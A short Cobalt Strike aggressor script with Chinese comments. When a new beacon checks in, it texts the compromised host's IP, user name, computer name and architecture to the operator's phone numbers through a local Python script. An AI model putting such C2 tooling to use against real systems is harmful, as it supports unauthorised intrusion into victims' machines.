#Sms.cna 
#Config
$Switch = "on"; #开关
#Config


on beacon_initial { # 在Beacon 初始化时执行，也就是上线时执行

    if ($Switch eq "on"){ #判断开关是否为on
        action("\c9Sending SMS......"); # 调试信息发送到CS的公屏上，代表短信正在发送
        $IP = beacon_info($1, "external"); #取上线主机IP
        $User = beacon_info($1, "user"); #取上线主机用户名
        $ComName = beacon_info($1, "computer"); #取上线主机计算机名
        $Arch = beacon_info($1, "arch"); #取上线主机架构
        @Curl_command = @('python', '/sms.py'  ,'13888888888,1300000000,13100000000',$IP,$User,$ComName,$Arch); #定义执行短信发送脚本命令,需要几个手机号就填几个逗号分隔 sms.py一定要写服务器的绝对路径
        exec(@Curl_command); #执行短信发送命令
        println(@Curl_command);
        action("\c9Send SMS Done: ".$ComName."!");
    }
}
